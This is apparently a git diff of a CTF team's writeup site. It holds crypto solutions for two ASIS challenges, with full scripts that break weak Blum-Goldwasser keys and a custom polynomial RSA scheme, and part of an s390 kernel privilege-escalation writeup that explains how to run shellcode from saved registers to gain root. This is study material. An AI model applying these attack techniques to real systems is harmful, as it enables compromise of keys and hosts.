+After solving Jazzy there's not much to this challenge. We know that it is an implementation of Blum-Goldwasser (albeit with an additional xorkey). Blum-Goldwasser's security relies on the hardness of factoring $n = p\cdot q$ and so our best chance to solve this puzzle is to find the factors of the pubkey.
+
+Looking at the challenge, we see we are given many many instances of the encryption. With all of these public keys, wouldn't it be a shame if some of them shared a factor?
+
+Putting the data into an array, I checked for common factors using `gcd` in the following way:
+
+```python
+import math
+
+def find_factors(data):
+    data_length = len(data)
+    for i in range(data_length):
+        p = data[i][0]
+        for j in range(i+1,data_length):
+            x = data[j][0]
+            if math.gcd(p,x) != 1:
+                print(f'i = {i}')
+                print(f'j = {j}')
+                print(f'p = {math.gcd(p,x)}')
+                return i, math.gcd(p,x)
+```
+
+Very quickly we get output:
+
+```python
+i = 0
+j = 7
+p = 114699564889863002119717546749303415014640174666510831598557661431094864991761656658454471662058404464073476167628817149960697375037558130201947795111687982132434309682025253703831106682712999472078751154844115223133651609962643428282001182462505433609132703623568072665114357116233526985586944694577610098899
+```
+
+and so with this, the whole encryption scheme is broken (ignoring the xorkey step of course).
+
+With the factors of the pubkey, we can follow the decryption algorithm on [Wikipedia](https://en.wikipedia.org/wiki/Blum–Goldwasser_cryptosystem#Decryption) to get
+
+```python
+from Crypto.Util.number import long_to_bytes
+
+def xgcd(a, b):
+    """return (g, x, y) such that a*x + b*y = g = gcd(a, b)"""
+    x0, x1, y0, y1 = 0, 1, 1, 0
+    while a != 0:
+        (q, a), b = divmod(b, a), a
+        y0, y1 = y1, y0 - q * y1
+        x0, x1 = x1, x0 - q * x1
+    return b, x0, y0
+
+
+def decrypt(c, pubkey, p, q, s):
+    h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/
+    if len(bin(c)[2:]) % h != 0:
+        c = '0' * (h - len(bin(c)[2:]) % h) + bin(c)[2:]
+    else:
+        c = bin(c)[2:]
+    t = len(c) // h
+
+    # Recover s0
+    dp = (((p + 1) // 4)**(t + 1)) % (p - 1)
+    dq = (((q + 1) // 4)**(t + 1)) % (q - 1)
+    up = pow(s, dp, p)
+    uq = pow(s, dq, q)
+    _, rp, rq = xgcd(p,q)
+    s_0 = (uq * rp * p + up * rq * q ) % pubkey
+
+    C = [c[h*i:h*i+h] for i in range(t)]
+    M = []
+    for i in range(t):
+        s_i = pow(s_0, 2, pubkey)
+        k = bin(s_i)[2:][-h:]
+        m = bin(int(C[i], 2) ^ int(k, 2))[2:].zfill(h)
+        M.append(m)
+        s_0 = s_i
+
+    msg = long_to_bytes(int(''.join(M),2))
+    return msg
+```
+
+With the crypto system all sorted out and checked against the encryption function (without the xorkey) we just need to find a way to do this last step. I started trying to think of a clever way to undo the xor with knowledge of several ct / msg pairs (many of the public keys share common factors) but then I realised that the block size is only 10 bits long and a brute force of `xorkey` would only mean guessing 1024 values.
+
+So, I took the easy way and included a loop inside my decrypt trying all values for the `xorkey` and storing any decryptions that had the flag format: `ASIS{`. The script takes seconds and finds the flag.
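
Stripped of the Blum-Goldwasser machinery, the brute force looks roughly like the sketch below. It assumes the keystream blocks have already been recovered from the factorisation; the message, keystream values and mask are invented for the example, and `brute_xorkey` is a hypothetical helper name.

```python
def bits_to_bytes(bits):
    """Convert a binary string to bytes, dropping leading zero padding."""
    n = int(bits, 2)
    return n.to_bytes((n.bit_length() + 7) // 8, "big")


def brute_xorkey(cipher_blocks, key_blocks, h, marker=b"ASIS{"):
    """Try every h-bit mask X and keep decryptions of c ^ (k & X) containing `marker`."""
    hits = []
    for X in range(1 << h):
        bits = "".join(format(c ^ (k & X), f"0{h}b") for c, k in zip(cipher_blocks, key_blocks))
        plain = bits_to_bytes(bits)
        if marker in plain:
            hits.append((X, plain))
    return hits


# Toy data: a made-up message, keystream and mask (none of these come from the challenge).
h = 10
msg = b"ASIS{toy}"
bits = bin(int.from_bytes(msg, "big"))[2:]
bits = "0" * (-len(bits) % h) + bits
blocks = [int(bits[i:i + h], 2) for i in range(0, len(bits), h)]
keystream = [0x2A5, 0x13C, 0x3FF, 0x071, 0x298, 0x1E3, 0x0CD, 0x356]
secret_mask = 0b1011001110
cipher = [m ^ (k & secret_mask) for m, k in zip(blocks, keystream)]

hits = brute_xorkey(cipher, keystream, h)
print((secret_mask, msg) in hits)
```

Note that `&` binds tighter than `^` in Python, so `c ^ k & X` in the challenge source means `c ^ (k & X)`, which is what the sketch spells out.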
+
+
+
+### Implementation
+
+```python
+from Crypto.Util.number import *
+import math
+import random
+
+def find_factors(data):
+    data_length = len(data)
+    for i in range(data_length):
+        p = data[i][0]
+        for j in range(i+1,data_length):
+            x = data[j][0]
+            if math.gcd(p,x) != 1:
+                return i, math.gcd(p,x)
+
+
+def encrypt(msg, pubkey, xorkey):
+    h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/
+    m = bytes_to_long(msg)
+    if len(bin(m)[2:]) % h != 0:
+        m = '0' * (h - len(bin(m)[2:]) % h) + bin(m)[2:]
+    else:
+        m = bin(m)[2:]
+    t = len(m) // h
+    M = [m[h*i:h*i+h] for i in range(t)]
+    r = random.randint(1, pubkey)
+    s_0 = pow(r, 2, pubkey)
+    C = []
+    for i in range(t):
+        s_i = pow(s_0, 2, pubkey)
+        k = bin(s_i)[2:][-h:]
+        c = bin(int(M[i], 2) ^ int(k, 2) & xorkey)[2:].zfill(h)
+        C.append(c)
+        s_0 = s_i
+    enc = int(''.join(C), 2)
+    return (enc, pow(s_i, 2, pubkey))
+
+
+def xgcd(a, b):
+    """return (g, x, y) such that a*x + b*y = g = gcd(a, b)"""
+    x0, x1, y0, y1 = 0, 1, 1, 0
+    while a != 0:
+        (q, a), b = divmod(b, a), a
+        y0, y1 = y1, y0 - q * y1
+        x0, x1 = x1, x0 - q * x1
+    return b, x0, y0
+
+
+def decrypt(c, pubkey, p, q, s):
+    # Idiot checks
+    assert p*q == pubkey
+    assert isPrime(p) and isPrime(q)
+
+    h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/
+    if len(bin(c)[2:]) % h != 0:
+        c = '0' * (h - len(bin(c)[2:]) % h) + bin(c)[2:]
+    else:
+        c = bin(c)[2:]
+    t = len(c) // h
+
+    # Recover s0
+    dp = (((p + 1) // 4)**(t + 1)) % (p - 1)
+    dq = (((q + 1) // 4)**(t + 1)) % (q - 1)
+    up = pow(s, dp, p)
+    uq = pow(s, dq, q)
+    _, rp, rq = xgcd(p,q)
+    s0 = (uq * rp * p + up * rq * q ) % pubkey
+
+
+    C = [c[h*i:h*i+h] for i in range(t)]
+
+    # Brute xorkey (max size: 2**10 - 1)
+    flags = []
+    for X in range(1024):
+        # Restore value for brute, and empty M
+        s_0 = s0
+        M = []
+
+        for i in range(t):
+            s_i = pow(s_0, 2, pubkey)
+            k = bin(s_i)[2:][-h:]
+            m = bin(int(C[i], 2) ^ int(k, 2) & X)[2:].zfill(h)
+            M.append(m)
+            s_0 = s_i
+
+        fl = long_to_bytes(int(''.join(M),2))
+        try:
+            flag = fl.decode()
+            if "ASIS{" in flag:
+                flags.append(flag)
+        except UnicodeDecodeError:
+            # Wrong xorkey guesses usually give bytes that are not valid UTF-8
+            pass
+    return flags
+
+# data from challenge.txt, truncated to only two values to save space
+data = [[12097881278174698631026228331130314850080947749821686944446636213641310652138488716240453597129801720504043924252478136044035819232933933717808745477909546176235871786148513645805314150829468800301698799525780070273753857243854268554322340900904051857831398492096742127894417784386491191471947863787022245824307084379225579368393254254088207494229400873467930160606087032014972366802086915193167585867760542665623158008113534159892785943512727008525032377162641992852773743617023163398493300810949683112862817889094615912113456275357250831609021007534115476194023075806921879501827098755262073621876526524581992383113, (238917053353586684315740899995117428310480789049456179039998548040503724437945996038505262855730406127564439624355248861040378761737917431951065125651177801663731449217955736133484999926924447066163260418501214626962823479203542542670429310307929651996028669399692119495087327652345, 2361624084930103837444679853087134813420441002241341446622609644025375866099233019653831282014136118204068405467230446591931324445417288447017795525046075282581037551835081365996994851977871855718435321568545719382569106432442084085157579504951352401314610314893848177952589894962335072249886688614676995039846245628481594015356555808852415257590789843672862086889766599032421071154614466932749223855909572291554620301269793104658552481172052104139007105875898227773975867750358642521359331140861015951930087364330158718293540721277710068251667789725792771210694545702423605041261814818477350926741922865054617709373)],[1161807144598828615961454620022755466738920528174944300462911726412995774020377061564184714820481086566919168587415273026757346733895099327011378253776560877637519226340554603678745393982956168483430871711577576842130000661829689736527993735812679990452808392255230656562064481885535030635202436607697475948415021452861035535815278969667841073269959871456697721190362507519893531094734045626333920482006513490042705684318364018106623271451108729277142083934463598216
5997540089604798288048766074061479118366637656581936395586923631199316711697776366024769039316868119838263452674798226118946060593631451490164411150841, (108436642448932709219121968294434475477600203743366957190466733100162456074942118592019300422638950272524217814290069806411298263273760197756252555274382639125596214182186934977255300451278487595744525177460939465622410473654789382565188319818335934171653755811872501026071194087051, 10240139028494174526454562399217609608280817984150287983207668274231906642607868694849967043415262875107269045985517134901896201464915880088854955991401353416951487254838341232922059441309704096261457984093029892511268213868493162068362288179130193503313930139616441614927005917140608739837772400963531761014330142192223670723732255263011157267423056439150678533763741625000032136535639171133174846473584929951274026212224887370702861958817381113058491861009468609746592170191042660753210307932264867242863839876056977399186229782377108228334204340285592604094505980554432810891123635608989340677684302928462277247999)]]
+
+i, p = find_factors(data)
+n = data[i][0]
+c, s = data[i][1]
+q = n // p
+
+print(decrypt(c, n, p, q, s))
+```
+
+#### Flag
+
+`ASIS{1N_h0nOr_oF__Lenore__C4r0l_Blum}`
+
+
+## Tripolar
+
+**Disclaimer** I didn't solve this challenge during the competition and it took me reading a [writeup](https://ctftime.org/writeup/22112) to understand how this challenge works. I'm writing it up to talk myself through the solution, and maybe someone else will read this and be surprised by the solution too.
+
+After working through this, my take away is that my intuition for cube roots was way off! The key for solving this challenge is that given a polynomial of the form
+
+
+$$
+f(x, y, z) = x^3 + y^2 + z
+$$
+
+
+One can recover the value of $x$ by taking the integer cube root of $f(x,y,z)$. Even after I read this, I couldn't believe there wasn't some loss of information of the LSB of $x$, but the floor of the cube root is exactly $x$ whenever $y^2 + z < (x+1)^3 - x^3 = 3x^2 + 3x + 1$, and in the examples below it holds, even for small positive integers:
+
+```python
+>>> from Crypto.Util.number import *
+>>> import gmpy2
+>>> gmpy2.get_context().precision = 4096
+>>> x, y, z = [getPrime(256) for _ in range(3)]
+>>> f = x**3 + y**2 + z
+>>> _x = gmpy2.iroot(f, 3)[0]
+>>> x == _x
+True
+>>> x, y, z = [getPrime(5) for _ in range(3)]
+>>> f = x**3 + y**2 + z
+>>> _x = gmpy2.iroot(f, 3)[0]
+>>> x == _x
+True
+```
+
+The same is true for quadratic terms, by looking at the square root of $f - x^3$, but here there seems to be a bit less certainty and we find with small enough inputs, the square root approximation can be off by 1.
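
It is worth pinning down when the cube-root trick is exact. The floor of the cube root of $x^3 + d$ equals $x$ precisely when $0 \le d < (x+1)^3 - x^3 = 3x^2 + 3x + 1$, so with $d = y^2 + z$ it can fail when $y$ is noticeably larger than $x$. The sketch below uses a pure-Python integer cube root (the helper names are made up) and shows one case on each side of the bound.

```python
def icbrt(n):
    """Floor of the cube root of a non-negative integer, by binary search."""
    lo, hi = 0, 1
    while hi**3 <= n:
        hi *= 2
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if mid**3 <= n:
            lo = mid
        else:
            hi = mid
    return lo


def root_recovers_x(x, y, z):
    """True if the integer cube root of x^3 + y^2 + z is exactly x."""
    return icbrt(x**3 + y**2 + z) == x


print(root_recovers_x(31, 17, 17))   # y^2 + z = 306 < 3*31^2 + 3*31 + 1 = 2977
print(root_recovers_x(17, 31, 31))   # y^2 + z = 992 > 3*17^2 + 3*17 + 1 = 919
```

The first call prints `True` and the second `False`, so for primes of the same bit length the recovery is likely but not guaranteed.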
+
+Anyway... with my display of ignorance out the way, let's look at the challenge!
+
+
+### Challenge
+
+```python
+#!/usr/bin/python
+
+from Crypto.Util.number import *
+from hashlib import sha1
+from flag import flag
+
+def crow(x, y, z):
+    return (x**3 + 3*(x + 2)*y**2 + y**3 + 3*(x + y + 1)*z**2 + z**3 + 6*x**2 + (3*x**2 + 12*x + 5)*y + (3*x**2 + 6*(x + 1)*y + 3*y**2 + 6*x + 2)*z + 11*x) // 6
+
+def keygen(nbit):
+    p, q, r = [getPrime(nbit) for _ in range(3)]
+    pk = crow(p, q, r)
+    return (p, q, r, pk)
+
+def encrypt(msg, key):
+    p, q, r, pk = key
+    _msg = bytes_to_long(msg)
+    assert _msg < p * q * r
+    _hash = bytes_to_long(sha1(msg).digest())
+    _enc = pow(_msg, 31337, p * q * r)
+    return crow(_enc * pk, pk * _hash, _hash * _enc)
+
+key = keygen(256)
+enc = encrypt(flag, key)
+f = open('flag.enc', 'w')
+f.write(long_to_bytes(enc))
+f.close()
+```
+
+
+Reading through the code, we see that the flag is encrypted RSA style using three primes $p,q,r$. The message is also hashed with `sha1` and the three primes used for encryption are fed into some fairly ugly polynomial named `crow` to produce another value `pk`.
+
+The results of these computations are then multiplied together in pairs and fed into the `crow` function again. The only output of the challenge is `enc`, which is the value of the second evaluation of the `crow` polynomial.
+
+We then understand this challenge as learning how to find the integer solutions of `crow` so we can work backwards to finding the flag. Solving the first step will give us `_enc`, `_hash` and `pk`, and solving `pk = crow(p,q,r)` we can grab the primes and reverse the encryption of `_enc`. But how do we solve `crow`?
+
+During the competition I got totally sidetracked by the paper [A Strategy for Finding Roots of Multivariate Polynomials with New Applications in Attacking RSA Variants](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.61.8061&rep=rep1&type=pdf) by Jochemsz and May, and decided the solution to this puzzle must be to implement the small integer roots algorithm that they give in 2.2 of the paper. This was hard to specialise to this polynomial and I failed. Potentially this method works, but I couldn't get it to. The closest I got was to notice that the bitsize of `_enc*pk` was larger than the other two elements of `crow` and so by taking the cube root, I could recover the MSB of `_enc*pk`. Typing this up now I see I was kind of close, but thinking totally wrong.
+
+The real solution is much simpler and more elegant, and relies on the fact that we can isolate certain terms in the polynomial because they appear with different powers (I've already explained this a little in the disclaimer). What we find is that with a few steps of algebra and a resetting of my intuition of cube roots, this challenge has a nice solution.
+
+
+### Solution
+
+The first step to solving this challenge is simplifying the polynomial. I went down a rabbit hole of Legendre polynomials, taking the "dipole" hint way too seriously. I'm not sure what the "Tripolar" hint was pointing towards... maybe someone can enlighten me.
+
+The crow polynomial is given to us in the form
+
+$$
+\begin{align}
+C(x,y,z) &= \frac16 \big( x^3 + 3(x + 2)y^2 + y^3 + 3(x + y + 1)z^2 + z^3 + 6x^2\\
+ &+ (3x^2 + 12x + 5)y + (3x^2 + 6(x + 1)y + 3y^2 + 6x + 2)z + 11x \big)
+\end{align}
+$$
+
+This is a big mess, but we can notice that the coefficient for all cubic terms is $1$ (ignoring the overall factor of a sixth) and we can start to piece together simple parts of this expression until we obtain
+
+$$
+C(x,y,z) = \frac16 \left((x + y + z + 1 )^3 + 3(x + y + 1)^2 + 2(x + y + 1) - 6y - z - 6 \right)
+$$
+
+This is looking better, and by renaming a few pieces we get the polynomial into the form
+
+$$
+C(x,y,z) = \frac16 \left( f^3 + 3h^2 +2h -6y - z - 6 \right) \\
+$$
+
+Where we have defined
+
+$$
+f(x,y,z) = x + y + z + 1 \qquad h(x,y) = x + y + 1
+$$
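
Since the simplification is easy to get wrong by hand, here is a small brute-force sanity check comparing the original `crow` with the rewritten form on a grid of small non-negative inputs. It is only a check on sample values, not a proof.

```python
from itertools import product


def crow(x, y, z):
    """The polynomial exactly as given in the challenge source."""
    return (x**3 + 3*(x + 2)*y**2 + y**3 + 3*(x + y + 1)*z**2 + z**3 + 6*x**2
            + (3*x**2 + 12*x + 5)*y + (3*x**2 + 6*(x + 1)*y + 3*y**2 + 6*x + 2)*z + 11*x) // 6


def alt_crow(x, y, z):
    """The simplified form in terms of f = x + y + z + 1 and h = x + y + 1."""
    f = x + y + z + 1
    h = x + y + 1
    return (f**3 + 3*h**2 + 2*h - 6*y - z - 6) // 6


print(all(crow(x, y, z) == alt_crow(x, y, z) for x, y, z in product(range(20), repeat=3)))
```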
+
+
+We now see how the disclaimer discussed above is going to help us. By taking the cube root of $6C$ (six times `enc`), we will recover the value for $f(x,y,z)$! Following this, we know that
+
+
+$$
+6 C - f^3 = 3h^2 + 2h - 6y - z - 6,
+$$
+
+
+and by the same approximation, the square root of one third of the left hand side, $(6C - f^3)/3$, will be a good approximation for $h$. **Note** for the second time we solve `crow`, with the smaller inputs of the three primes, we will find this approximation is off by one, which can be spotted by either making mistakes, or trying out this step with some known values of $p,q,r$.
+
+With knowledge of both $f(x,y,z)$ and $h(x,y)$, we can recover the input values from the three expressions
+
+
+$$
+\begin{align}
+z &= f - h \\
+y &= -\frac16 \left( 6C - f^3 - 3h^2 - 2h + z + 6\right) \\
+x &= h - y - 1
+\end{align}
+$$
+
+
+With the triple $(x,y,z)$ from `crow` we can find the input parameters from the gcd of the inputs:
+
+```python
+import math
+
+_enc = math.gcd(x,z)
+pk = math.gcd(x,y)
+_hash = math.gcd(y,z)
+```
+
+Solving `crow` from `pk` will give three primes $p,q,r$ and from that we can decrypt `_enc` from
+
+```python
+from Crypto.Util.number import *
+
+N = p*q*r
+phi = (p-1)*(q-1)*(r-1)
+d = inverse(31337, phi)
+m = pow(_enc, d, N)
+print(long_to_bytes(m))
+```
+
+
+
+### Implementation
+
+
+```python
+import gmpy2
+import math
+from Crypto.Util.number import *
+from hashlib import sha1
+gmpy2.get_context().precision = 4096
+
+def crow(x, y, z):
+    return (x**3 + 3*(x + 2)*y**2 + y**3 + 3*(x + y + 1)*z**2 + z**3 + 6*x**2 + (3*x**2 + 12*x + 5)*y + (3*x**2 + 6*(x + 1)*y + 3*y**2 + 6*x + 2)*z + 11*x) // 6
+
+
+def keygen(nbit):
+    p, q, r = [getPrime(nbit) for _ in range(3)]
+    pk = crow(p, q, r)
+    return (p, q, r, pk)
+
+
+def encrypt(msg, key):
+    p, q, r, pk = key
+    _msg = bytes_to_long(msg)
+    assert _msg < p * q * r
+    _hash = bytes_to_long(sha1(msg).digest())
+    _enc = pow(_msg, 31337, p * q * r)
+    return crow(_enc * pk, pk * _hash, _hash * _enc)
+
+
+def alt_crow(x, y, z):
+    return ((x + y + z + 1 )**3 + 3*(x + y + 1)**2 + 2*(x + y + 1) - 6*y - z - 6) // 6
+
+
+def solve_crow(c, delta):
+    """
+    Solve equation of the form:
+    crow = [(x + y + z + 1 )**3 + 3*(x + y + 1)**2 + 2*(x + y + 1) - 6*y - z - 6] // 6
+         = [f^3 + 3h^2 + 2h - g] // 6
+    f = x + y + z + 1
+    h = x + y + 1
+    g = 6y + z + 6
+    """
+    f = gmpy2.iroot(6*c, 3)[0]
+    h2 = (6*c - f**3) // 3
+    # For small values of inputs, the square root is off by one
+    h = gmpy2.iroot(h2, 2)[0] + delta
+    z = f - h
+    y = -(6*c - f**3 - 3*h**2 - 2*h + z + 6) // 6
+    x = h - y - 1
+    assert crow(x, y, z) == c
+    return x,y,z
+
+
+def decrypt(ct):
+    # Solve for arguments
+    x, y, z = solve_crow(ct, 0)
+    assert crow(x, y, z) == ct
+
+    # Recover pieces
+    _enc = math.gcd(x, z)
+    pk = x // _enc
+    _hash = z // _enc
+    assert crow(_enc * pk, pk * _hash, _hash * _enc) == ct
+
+    # Solve for primes
+    p, q, r = solve_crow(pk, 1)
+    assert crow(p, q, r) == pk
+
+    # Solve encryption
+    N = p*q*r
+    phi = (p-1)*(q-1)*(r-1)
+    d = inverse(31337, phi)
+    m = pow(_enc, d, N)
+    return long_to_bytes(m)
+
+# Sanity test
+p, q, r, pk = keygen(256)
+# Check alt form is correct
+assert alt_crow(p,q,r) == pk
+# Check solver finds values
+x, y, z = solve_crow(pk, 1)
+assert x == p and y == q and z == r
+
+ct = open('flag.enc', "rb").read()
+ct = bytes_to_long(ct)
+flag = decrypt(ct)
+print(flag)
+```
+
+
+#### Flag
+
+`ASIS{I7s__Fueter-PoLy4__c0nJ3c7UrE_iN_p4Ir1n9_FuNCT10n}`
diff --git a/CNAME b/CNAME
new file mode 100644
index 0000000..ec97f5d
--- /dev/null
+++ b/CNAME
@@ -0,0 +1 @@
+org.anize.rs
diff --git a/CTFzone-2022/index.html b/CTFzone-2022/index.html
new file mode 100755
index 0000000..569bff2
--- /dev/null
+++ b/CTFzone-2022/index.html
@@ -0,0 +1,216 @@
+CTFzone 2022 | Organisers
+
The custom syscall zeroes every general-purpose register and then jumps to an
+address chosen by us. Somehow we have to use this to become root.
+
+
What makes this challenge difficult is that we have to write a kernel exploit for a fairly obscure architecture that no one on the team had seen before, and which is not supported by most of the tools we normally use (pwndbg, gef, vmlinux-to-elf, etc…).
+
+
Exploitation
+
+
The first thing I tried was to replicate the solution we used for the original
+challenge at SECCON. Unfortunately that doesn’t work because the root filesystem
+is no longer in an initramfs but in an ext2 disk. The flag is no longer in memory
+and we would need to read from the disk first.
+
+
I also tried to use the intended solution for the original challenge (inject
+shellcode in the kernel by using the eBPF JIT), but…
+
+
/ $ /pwn
+seccomp: Function not implemented
+
+
+
it looks like the challenge kernel is compiled without eBPF or seccomp, so we
+can’t use that to inject shellcode either.
+
+
I also tried to load some shellcode in userspace and then jump to it.
Unfortunately that didn’t work either. At this point I started reading more about
+the architecture that the challenge is running on. I found this page from the
+Linux kernel documentation, as well as IBM’s manual, useful.
+
+
As it turns out, on z/Architecture the kernel and userspace programs run in
+completely different address spaces. Userspace memory is simply not accessible
+from kernel mode without using special instructions and we cannot jump to
+shellcode there.
+
+
At this point I was out of ideas and I started looking at the implementation of
+Linux’s system call handler for inspiration. One thing that I found interesting
+is that the system call handler reads information such as the kernel stack
+from a special page located at address zero. The structure of this special zero
+page (lowcore) is described in this Linux header file.
+
+
Interestingly enough on this architecture, or at least on the version emulated by
+QEMU, all memory is executable. Linux’s system call handler even jumps to a
+location in the zero page to return to userspace. If we could place some
+controlled data somewhere, we could just jump to it to get arbitrary code
+execution in the kernel.
+
+
At some point I started looking at the contents of the zero page in gdb and I
+realized that there is some memory that we could control there and use as
+shellcode. For example save_area_sync at offset 0x200 contains the values of
+registers r8-r15 before the system call. The values of those registers are completely
+controlled by us in userspace. What if we placed some shellcode in the registers
+and jumped to it? I used a very similar idea to solve kernote from the 0CTF 2021 finals
+except this time instead of merely using the saved registers as a ROP chain,
+they’re actually executable and we can use them to store actual shellcode!
+
+
We only have 64 bytes of space for the shellcode, which isn’t a lot but should
+be enough for a small snippet that gives us root and returns to userspace.
+
+
The zero page even contains a pointer to the current task, and we can use that
+to find a pointer to our process’s creds structure and zero the uid to get root.
+
+
+
+
+
+
+
diff --git a/CTFzone-2022/pwn/390_gadget.md b/CTFzone-2022/pwn/390_gadget.md
new file mode 100755
index 0000000..9ff925f
--- /dev/null
+++ b/CTFzone-2022/pwn/390_gadget.md
@@ -0,0 +1,229 @@
+# THREE NINETY GADGET
+
+**Authors** [Nspace](https://twitter.com/_MatteoRizzo)
+
+**Tags**: pwn, kernel, mainframe, s390
+
+**Points**: 500 (1 solve)
+
+> one_gadget? kone_gadget? [THREE NINETY GADGET!!!](https://ctf.bi.zone/files/three_ninety_gadget_824de25c9ea8a326964a4d1cb5c0e98ed2506416e13093334cc07dc69beb23d7.tar.xz) nc three_ninety_gadget.ctfz.one 390
+
+## Analysis
+
+This challenge is basically `kone_gadget` from SECCON 2021 (writeup [here](../../SECCON-2021/pwn/kone_gadget)) ported to s390x.
+
+Like in the original challenge, the author patched the kernel to add a new syscall:
+
+```c
+SYSCALL_DEFINE1(s390_gadget, unsigned long, pc)
+{
+ register unsigned long r14 asm("14") = pc;
+ asm volatile("xgr %%r0,%%r0\n"
+ "xgr %%r1,%%r1\n"
+ "xgr %%r2,%%r2\n"
+ "xgr %%r3,%%r3\n"
+ "xgr %%r4,%%r4\n"
+ "xgr %%r5,%%r5\n"
+ "xgr %%r6,%%r6\n"
+ "xgr %%r7,%%r7\n"
+ "xgr %%r8,%%r8\n"
+ "xgr %%r9,%%r9\n"
+ "xgr %%r10,%%r10\n"
+ "xgr %%r11,%%r11\n"
+ "xgr %%r12,%%r12\n"
+ "xgr %%r13,%%r13\n"
+ "xgr %%r15,%%r15\n"
+ ".machine push\n"
+ ".machine z13\n"
+ "vzero %%v0\n"
+ "vzero %%v1\n"
+ "vzero %%v2\n"
+ "vzero %%v3\n"
+ "vzero %%v4\n"
+ "vzero %%v5\n"
+ "vzero %%v6\n"
+ "vzero %%v7\n"
+ "vzero %%v8\n"
+ "vzero %%v9\n"
+ "vzero %%v10\n"
+ "vzero %%v11\n"
+ "vzero %%v12\n"
+ "vzero %%v13\n"
+ "vzero %%v14\n"
+ "vzero %%v15\n"
+ "vzero %%v16\n"
+ "vzero %%v17\n"
+ "vzero %%v18\n"
+ "vzero %%v19\n"
+ "vzero %%v20\n"
+ "vzero %%v21\n"
+ "vzero %%v22\n"
+ "vzero %%v23\n"
+ "vzero %%v24\n"
+ "vzero %%v25\n"
+ "vzero %%v26\n"
+ "vzero %%v27\n"
+ "vzero %%v28\n"
+ "vzero %%v29\n"
+ "vzero %%v30\n"
+ "vzero %%v31\n"
+ ".machine pop\n"
+ "br %0"
+ : : "r" (r14));
+ unreachable();
+}
+```
+
+The custom syscall zeroes every general-purpose register except r14, which holds the jump target, as well as all 32 vector registers, and then jumps to an
+address chosen by us. Somehow we have to use this to become root.
+
+What makes this challenge difficult is that we have to write a kernel exploit for a fairly obscure architecture that no one on the team had seen before, and which is not supported by most of the tools we normally use (pwndbg, gef, vmlinux-to-elf, etc...).
+
+## Exploitation
+
+The first thing I tried was to replicate the solution we used for the original
+challenge at SECCON. Unfortunately that doesn't work because the root filesystem
+is no longer in an initramfs but in an ext2 disk. The flag is no longer in memory
+and we would need to read from the disk first.
+
+I also tried to use the intended solution for the original challenge (inject
+shellcode in the kernel by using the eBPF JIT), but...
+
+```
+/ $ /pwn
+seccomp: Function not implemented
+```
+
+it looks like the challenge kernel is compiled without eBPF or seccomp, so we
+can't use that to inject shellcode either.
+
+I also tried to load some shellcode in userspace and then jump to it, but the kernel panicked:
+
+```
+[ 4.215891] Kernel stack overflow.
+[ 4.216147] CPU: 1 PID: 43 Comm: pwn Not tainted 5.18.10 #1
+[ 4.216363] Hardware name: QEMU 3906 QEMU (KVM/Linux)
+[ 4.216532] Krnl PSW : 0704c00180000000 0000000001000a62 (0x1000a62)
+[ 4.216964] R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:3 CC:0 PM:0 RI:0 EA:3
+[ 4.217079] Krnl GPRS: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
+[ 4.217140] 0000000000000000 0000000000000000 0000000000000000 0000000000000000
+[ 4.217196] 0000000000000000 0000000000000000 0000000000000000 0000000000000000
+[ 4.217251] 0000000000000000 0000000000000000 0000000001000a60 0000000000000000
+[ 4.218310] Krnl Code: 0000000001000a5c: 0000 illegal
+[ 4.218310] 0000000001000a5e: 0000 illegal
+[ 4.218310] #0000000001000a60: 0000 illegal
+[ 4.218310] >0000000001000a62: 0000 illegal
+[ 4.218310] 0000000001000a64: 0000 illegal
+[ 4.218310] 0000000001000a66: 0000 illegal
+[ 4.218310] 0000000001000a68: 0000 illegal
+[ 4.218310] 0000000001000a6a: 0000 illegal
+[ 4.218850] Call Trace:
+[ 4.219231] [<00000000001144de>] show_regs+0x4e/0x80
+[ 4.219718] [<000000000010196a>] kernel_stack_overflow+0x3a/0x50
+[ 4.219780] [<0000000000000200>] 0x200
+[ 4.219958] Last Breaking-Event-Address:
+[ 4.219996] [<0000000000000000>] 0x0
+[ 4.220445] Kernel panic - not syncing: Corrupt kernel stack, can't continue.
+[ 4.220652] CPU: 1 PID: 43 Comm: pwn Not tainted 5.18.10 #1
+[ 4.220727] Hardware name: QEMU 3906 QEMU (KVM/Linux)
+[ 4.220792] Call Trace:
+[ 4.220816] [<00000000004ce1a2>] dump_stack_lvl+0x62/0x80
+[ 4.220879] [<00000000004c4d16>] panic+0x10e/0x2d8
+[ 4.220933] [<0000000000101980>] s390_next_event+0x0/0x40
+[ 4.220986] [<0000000000000200>] 0x200
+```
+
+Unfortunately that didn't work either. At this point I started reading more about
+the architecture that the challenge is running on. I found [this page](https://www.kernel.org/doc/html/v5.3/s390/debugging390.html) from the
+Linux kernel documentation, as well as IBM's manual, useful.
+
+As it turns out, on z/Architecture the kernel and userspace programs run in
+completely different address spaces. Userspace memory is simply not accessible
+from kernel mode without using special instructions and we cannot jump to
+shellcode there.
+
+At this point I was out of ideas and I started looking at the implementation of
+Linux's system call handler for inspiration. One thing that I found interesting
+is that the system call handler reads information such as the kernel stack
+from a special page located at address zero. The structure of this special zero
+page (lowcore) is described in [this Linux header file](https://elixir.bootlin.com/linux/latest/source/arch/s390/include/asm/lowcore.h).
+
+Interestingly enough on this architecture, or at least on the version emulated by
+QEMU, all memory is executable. Linux's system call handler even jumps to a
+location in the zero page to return to userspace. If we could place some
+controlled data somewhere, we could just jump to it to get arbitrary code
+execution in the kernel.
+
+At some point I started looking at the contents of the zero page in gdb and I
+realized that there _is_ some memory that we could control there and use as
+shellcode. For example `save_area_sync` at offset 0x200 contains the values of
+registers r8-r15 before the system call. The values of those registers are completely
+controlled by us in userspace. What if we placed some shellcode in the registers
+and jumped to it? I used a very similar idea to solve [kernote](../../0CTF-2021-finals/pwn/kernote) from the 0CTF 2021 finals
+except this time instead of merely using the saved registers as a ROP chain,
+they're actually executable and we can use them to store actual shellcode!
+
+We only have 64 bytes of space for the shellcode, which isn't a lot but should
+be enough for a small snippet that gives us root and returns to userspace.
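
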